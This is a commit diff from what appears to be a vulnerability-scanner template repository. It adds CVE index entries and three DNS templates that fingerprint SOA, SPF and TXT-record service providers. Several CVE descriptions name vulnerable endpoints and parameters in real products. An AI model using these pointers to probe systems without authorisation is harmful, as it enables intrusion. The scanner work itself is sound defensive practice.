Merge branch 'main' into fuzzing-templates

patch-1
Sandeep Singh 2024-03-22 22:49:03 +05:30 committed by GitHub
commit 3c9125f3ed
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
58 changed files with 860 additions and 134 deletions

View File

@ -3,6 +3,9 @@ on:
push:
paths:
- '.new-additions'
- 'dns/soa-detect.yaml'
- 'dns/spf-record-detect.yaml'
- 'dns/txt-service-detect.yaml'
- 'file/keys/dependency/dependency-track.yaml'
- 'file/keys/docker/dockerhub-pat.yaml'
- 'file/keys/doppler/doppler-audit.yaml'
@ -32,7 +35,9 @@ on:
- 'http/cves/2023/CVE-2023-49785.yaml'
- 'http/cves/2023/CVE-2023-5830.yaml'
- 'http/cves/2023/CVE-2023-5914.yaml'
- 'http/cves/2024/CVE-2024-1212.yaml'
- 'http/cves/2024/CVE-2024-1698.yaml'
- 'http/cves/2024/CVE-2024-27954.yaml'
- 'http/exposed-panels/bynder-panel.yaml'
- 'http/exposed-panels/cisco/cisco-expressway-panel.yaml'
- 'http/exposed-panels/emqx-panel.yaml'
@ -42,11 +47,14 @@ on:
- 'http/exposed-panels/osnexus-panel.yaml'
- 'http/exposed-panels/posteio-admin-panel.yaml'
- 'http/exposed-panels/skeepers-panel.yaml'
- 'http/exposures/files/generic-db.yaml'
- 'http/misconfiguration/installer/posteio-installer.yaml'
- 'http/osint/phishing/kakao-login-phish.yaml'
- 'http/osint/phishing/naver-login-phish.yaml'
- 'http/technologies/directus-detect.yaml'
- 'http/technologies/microsoft/aspnet-version-detect.yaml'
- 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml'
- 'http/technologies/wing-ftp-service-detect.yaml'
- 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml'
- 'network/detection/wing-ftp-detect.yaml'
workflow_dispatch:

View File

@ -1,3 +1,6 @@
dns/soa-detect.yaml
dns/spf-record-detect.yaml
dns/txt-service-detect.yaml
file/keys/dependency/dependency-track.yaml
file/keys/docker/dockerhub-pat.yaml
file/keys/doppler/doppler-audit.yaml
@ -27,7 +30,9 @@ file/keys/wireguard/wireguard-private.yaml
http/cves/2023/CVE-2023-49785.yaml
http/cves/2023/CVE-2023-5830.yaml
http/cves/2023/CVE-2023-5914.yaml
http/cves/2024/CVE-2024-1212.yaml
http/cves/2024/CVE-2024-1698.yaml
http/cves/2024/CVE-2024-27954.yaml
http/exposed-panels/bynder-panel.yaml
http/exposed-panels/cisco/cisco-expressway-panel.yaml
http/exposed-panels/emqx-panel.yaml
@ -37,10 +42,13 @@ http/exposed-panels/neocase-hrportal-panel.yaml
http/exposed-panels/osnexus-panel.yaml
http/exposed-panels/posteio-admin-panel.yaml
http/exposed-panels/skeepers-panel.yaml
http/exposures/files/generic-db.yaml
http/misconfiguration/installer/posteio-installer.yaml
http/osint/phishing/kakao-login-phish.yaml
http/osint/phishing/naver-login-phish.yaml
http/technologies/directus-detect.yaml
http/technologies/microsoft/aspnet-version-detect.yaml
http/technologies/microsoft/aspnetmvc-version-disclosure.yaml
http/technologies/wing-ftp-service-detect.yaml
http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml
network/detection/wing-ftp-detect.yaml

View File

@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,azure,bruteforce,enum
tags: cloud,cloud-enum,azure,fuzz,enum
self-contained: true
@ -63,4 +63,4 @@ dns:
part: answer
words:
- "IN\tA"
# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950

View File

@ -1386,7 +1386,7 @@
{"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"}
{"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"}
{"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"}
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"}
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"}
{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"}
{"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"}
{"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"}
@ -2171,7 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2227,6 +2227,7 @@
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
@ -2257,8 +2258,10 @@
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"}
{"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
{"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
@ -2267,6 +2270,8 @@
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
{"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"}
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
@ -2295,6 +2300,8 @@
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"}
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
@ -2307,6 +2314,9 @@
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}

View File

@ -1 +1 @@
d1c0809e63305403ca431401cfcebe07
0718093f8377862f2723b488bb15e23a

84
dns/soa-detect.yaml Normal file
View File

@ -0,0 +1,84 @@
id: soa-detect
info:
name: SOA Record Service - Detection
author: rxerium
severity: info
description: |
Detects which domain provider a domain is using, detected through SOA records
reference:
- https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/
metadata:
max-request: 1
verified: true
tags: dns,soa
dns:
- name: "{{FQDN}}"
type: SOA
matchers-condition: or
matchers:
- type: word
name: "cloudflare"
words:
- "dns.cloudflare.com"
- type: word
name: "amazon-web-services"
words:
- "awsdns"
- type: word
name: "akamai"
words:
- "hostmaster.akamai.com"
- type: word
name: "azure"
words:
- "azure-dns.com"
- type: word
name: "ns1"
words:
- "nsone.net"
- type: word
name: "verizon"
words:
- "verizon.com"
- type: word
name: "google-cloud-platform"
words:
- "googledomains.com"
- "google.com"
- type: word
name: "alibaba"
words:
- "alibabadns.com"
- type: word
name: "safeway"
words:
- "safeway.com"
- type: word
name: "mark-monitor"
words:
- "markmonitor.com"
- "markmonitor.zone"
- type: word
name: "hetznet"
words:
- "hetzner.com"
- type: word
name: "edge-cast"
words:
- "edgecastdns.net"
# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,25 @@
id: spf-record-detect
info:
name: SPF Record - Detection
author: rxerium
severity: info
description: |
An SPF TXT record was detected
reference:
- https://www.mimecast.com/content/how-to-create-an-spf-txt-record
tags: dns,spf
dns:
- name: "{{FQDN}}"
type: TXT
matchers:
- type: word
words:
- "v=spf1"
extractors:
- type: regex
regex:
- "v=spf1(.+)"
# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950

221
dns/txt-service-detect.yaml Normal file
View File

@ -0,0 +1,221 @@
id: txt-service-detect
info:
name: DNS TXT Service - Detect
author: rxerium
severity: info
description: |
Finding the services companies use via their TXT records.
reference:
- https://www.abenezer.ca/blog/services-companies-use-txt-records
metadata:
max-request: 1
verified: true
tags: dns,txt
dns:
- name: "{{FQDN}}"
type: TXT
matchers-condition: or
matchers:
- type: word
name: "keybase"
words:
- "keybase-site-verification"
- type: word
name: "proton-mail"
words:
- "protonmail-verification"
- type: word
name: "webex"
words:
- "webexdomainverification"
- type: word
name: "apple"
words:
- "apple-domain-verification"
- type: word
name: "facebook"
words:
- "facebook-domain-verification"
- type: word
name: "autodesk"
